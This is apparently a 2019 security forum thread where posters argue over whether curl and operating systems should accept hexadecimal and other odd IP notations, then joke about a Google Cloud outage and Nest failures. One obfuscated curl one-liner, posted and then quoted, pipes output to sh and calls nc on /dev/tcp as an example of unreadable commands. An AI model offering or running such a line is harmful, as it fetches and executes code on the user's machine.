|
smh if you don't have decades old notes on ip representations that technically work today, because security is about what the program will accept not what it should
|
# ? Jun 2, 2019 19:23 |
|
|
# ? Apr 19, 2024 11:52 |
|
Wiggly Wayne DDS posted:smh if you don't have decades old notes on ip representations that technically work today, because security is about what the program will accept not what it should I have notes I’m sure, but I guess I should check them more carefully!
|
# ? Jun 2, 2019 19:24 |
|
Wiggly Wayne DDS posted:smh if you don't have decades old notes on ip representations that technically work today, because security is about what the program will accept not what it should cool let's be sure to let every single user know about this esoterica oh wait, we don't (i didn't even remember this stuff which is why i posted it originally), it's just another dumb security thing ready to bite laypeople in the rear end barring that, maybe a little bit of safety? ipv4 expressed in dot notation is pretty much the agreed upon format so maybe the os shouldn't expose any other way to users?
|
# ? Jun 2, 2019 19:29 |
|
Why would you bring up how source code handles or stores numeric values at all? The premise of that arugment is that you're going to take input from a human and then just naively pass it into some code without sanitizing it? No way should a browser or curl be accepting hexadecimal addresses, and any excuse about "it'd be too hard to change" is just a lovely excuse that hurts end users. Yeah, I get it, you shouldn't blindly copy and paste poo poo. The reality of the world though is that 90% of people do this. How many people are there in the entire world who could read this and tell you exactly what it does without having to spend a few hours reading about it: curl -gsS https://127.0.0.1-or-victim-server:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00%5C<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost Ten thousand? Probably not 100,000. I use linux professionally every day for the last 8 years and I had to read the article and then spend 20 minutes playing with it to really understand how it was working. So just saying "oh read it before you paste it and understand what it does" is just not realistic for most people. Salt Fish fucked around with this message at 19:35 on Jun 2, 2019 |
# ? Jun 2, 2019 19:33 |
|
Salt Fish posted:Why would you bring up how source code handles or stores numeric values at all? The premise of that arugment is that you're going to take input from a human and then just naively pass it into some code without sanitizing it? No way should a browser or curl be accepting hexadecimal addresses, and any excuse about "it'd be too hard to change" is just a lovely excuse that hurts end users. curl is not exactly a consumer-grade, user-friendly browser and is used in tons of scripts so arguing that it shouldn't accept hex as a valid IP is a little silly. The entire premise is that people are following 'infosec twitter' and loving doing whatever dumb poo poo is posted without any critical thinking. It's not like your aunt Lucy with the 12-year old hand-me-down computer running windows XP is going to be in any way affected by this because it's targetted at a very specitic security try-hard class that attempts to understand security the same way an ape understands your skull with a hammer.
|
# ? Jun 2, 2019 19:37 |
|
ewiley posted:curl is not exactly a consumer-grade, user-friendly browser and is used in tons of scripts so arguing that it shouldn't accept hex as a valid IP is a little silly. The entire premise is that people are following 'infosec twitter' and loving doing whatever dumb poo poo is posted without any critical thinking. It's not like your aunt Lucy with the 12-year old hand-me-down computer running windows XP is going to be in any way affected by this because it's targetted at a very specitic security try-hard class that attempts to understand security the same way an ape understands your skull with a hammer. We're talking about two groups of people: 1) People who use curl but aren't super technical 2) The people writing scripts that use hex ip addresses And now we have to choose; do we put the technical burden on the general users to learn how to not get owned by obfuscation techniques? Or do we put the technical burden on the tech wizards using hex in their scripts to go update their code? You're saying we should put the technical burdern on the non-technical people, but I'm saying if you're clever enough to use hex ip addresses you're clever enough to update your poo poo with minimal disruption, do a conversion before you curl, it's literally a 1 line change to your code.
|
# ? Jun 2, 2019 19:44 |
curling will continue until the morale improves
|
|
# ? Jun 2, 2019 19:45 |
|
Salt Fish posted:We're talking about two groups of people: What non-technical person is using curl? notDan's tweet required you to paste it into a Linux commandline to do anything. What is the demographic of people with a). access to Linux comandline b) not technical enough to understand the Linux commandline the venn diagram is bad computer janitors who should either know better or now know better.
|
# ? Jun 2, 2019 19:49 |
|
Also LOL don't include that functionality in your app because i can't be assed to run stuff in a sandbox VM.
|
# ? Jun 2, 2019 19:51 |
|
Blinkz0rz posted:cool let's be sure to let every single user know about this esoterica Salt Fish posted:curl -gsS https://127.0.0.1-or-victim-server:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00%5C<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost at this point is the issue really the ip representation in the one-liner, or that it's possible for anything to be obscured in it at all? there's good arguments to be had on the correct way to interpret ips, but it's not really relevant if you're in a shell where the flexibility in handling representations is the core strength of chaining inputs between programs
|
# ? Jun 2, 2019 19:55 |
|
ewiley posted:What non-technical person is using curl? notDan's tweet required you to paste it into a Linux commandline to do anything. What is the demographic of people with or software developers who understand enough of their environment to write code but don't really care about how it works like literally everyone outside of security practitioners (and only some segments tbh) and os developers
|
# ? Jun 2, 2019 19:58 |
|
ewiley posted:What non-technical person is using curl? notDan's tweet required you to paste it into a Linux commandline to do anything. What is the demographic of people with when a take is so dumb i genuinely can't figure out if it's trolling
|
# ? Jun 2, 2019 20:00 |
|
Wiggly Wayne DDS posted:ya no one's saying every user should know this, it's in the pile of dumb legacy tricks that exist to make someone feel smart but shoot themselves in the foot i think we're sort of talking past each other. no one is suggesting that people should blindly execute any command on twitter and then pipe it to a shell. what i'm suggesting is that linux has a long standing tradition of doing a really lovely job separating the user interface from the underlying code and that will become a fundamental security issue as more people are using linux and macos
|
# ? Jun 2, 2019 20:09 |
|
where is linux involved here
|
# ? Jun 2, 2019 20:13 |
|
ok operating systems in general? like, you keep talking about how things are but the fact that a user can interact with an ip address expressed in multiple ways is awful ux and a potential sec gently caress that's continuously ready to happen
|
# ? Jun 2, 2019 20:25 |
|
Blinkz0rz posted:i think we're sort of talking past each other. no one is suggesting that people should blindly execute any command on twitter and then pipe it to a shell. what i'm suggesting is that linux has a long standing tradition of doing a really lovely job separating the user interface from the underlying code and that will become a fundamental security issue as more people are using linux and macos I think i'm agreeing with you that the underlying problem is uncritically running code from a tweet, but obfuscation will exist as long as there is code. Dumb tricks are a feature not a bug. I mean hell this is a perfectly valid perl script: code:
|
# ? Jun 2, 2019 20:26 |
|
there is some dumb ancient UNIX-related reason for almost every legacy computer issue. quit being so pedantic
|
# ? Jun 2, 2019 20:26 |
|
Blinkz0rz posted:the fact that a user can interact with an ip address expressed in multiple ways is awful ux and a potential sec gently caress that's continuously ready to happen
|
# ? Jun 2, 2019 20:27 |
Apparently google cloud is down and most of the internal tools inside google are down too
|
|
# ? Jun 2, 2019 22:03 |
|
Pryor on Fire posted:Apparently google cloud is down Wrap it up, Googailures. Last one out turn out the lights.
|
# ? Jun 2, 2019 22:07 |
|
I understand Level3 is having problems. Level3 is a backbone provider for the internet, and everything else, including Google being down, is just a cascade failure from the Level3 issues.
|
# ? Jun 2, 2019 22:09 |
|
Schadenboner posted:Wrap it up, Googailures. Last one out turn out the lights. can't turn off the lights, they're on nest https://news.ycombinator.com/item?id=20077971 quote:Can't use my Nest lock to let guests into my house. I'm pretty sure their infrastructure is hosted in Google Cloud. So yeah... definitely some stuff lost.
|
# ? Jun 2, 2019 23:15 |
|
security is a process (of blaming the user)
|
# ? Jun 2, 2019 23:32 |
|
nest users are confused https://twitter.com/internetofshit/status/1135310349438054401
|
# ? Jun 3, 2019 00:15 |
|
oh no moving from a chair to use the thing manually like some troglodyte is beneath the mighty *puts on glasses* stay at home dad twitch streamer wearing a boba fett hoody
|
# ? Jun 3, 2019 00:39 |
|
good thread to read in the morning: https://twitter.com/Foone/status/1135354815259656192
|
# ? Jun 3, 2019 12:20 |
|
Agile Vector posted:oh no moving from a chair to use the thing manually like some troglodyte is beneath the mighty *puts on glasses* stay at home dad twitch streamer wearing a boba fett hoody it gets better: https://twitter.com/jdantastic/status/1135313567346036741 fucker mounted his tv in front of it
|
# ? Jun 3, 2019 12:46 |
|
Chris Knight posted:it gets better:
|
# ? Jun 3, 2019 12:49 |
|
Excuse me, I believe you mean his Electronics Nook
|
# ? Jun 3, 2019 12:51 |
|
Volmarias posted:Excuse me, I believe you mean his Electronics Nook I was super confused about how why this dude was working in an office with no A/C, but it turns out that his office is in his home, because he plays video games for a living. His office is where he plays video games, for money. It all makes sense now. Twitch is like charity.
|
# ? Jun 3, 2019 13:12 |
|
Wiggly Wayne DDS posted:good thread to read in the morning: this was fun, thanks!
|
# ? Jun 3, 2019 13:33 |
|
Wiggly Wayne DDS posted:good thread to read in the morning: Very fun, thank you!
|
# ? Jun 3, 2019 14:17 |
|
Wiggly Wayne DDS posted:good thread to read in the morning: Neat.
|
# ? Jun 3, 2019 15:32 |
|
Wiggly Wayne DDS posted:good thread to read in the morning: cool story bro
|
# ? Jun 3, 2019 15:42 |
|
Wiggly Wayne DDS posted:good thread to read in the morning: this was really neat! and @foone is a pro twitter follow his best work is https://deathgenerator.com
|
# ? Jun 3, 2019 16:04 |
|
Is there a term for people tuning out (deliberately or subconsciously) common disclaimers or security warnings?
|
# ? Jun 3, 2019 17:27 |
|
Orcs and Ostriches posted:Is there a term for people tuning out (deliberately or subconsciously) common disclaimers or security warnings? alarm fatigue, probably
|
# ? Jun 3, 2019 17:28 |
|
like alarm fatigue?
|
# ? Jun 3, 2019 17:29 |
|
Nobody-can-tell-me-what-to-do-monia
|
# ? Jun 3, 2019 17:29 |
|
|
# ? Apr 19, 2024 11:52 |
|
haveblue posted:alarm fatigue, probably Trabisnikof posted:like alarm fatigue? Thanks. I knew I heard the term somewhere but I just couldn't recall it.
|
# ? Jun 3, 2019 17:31 |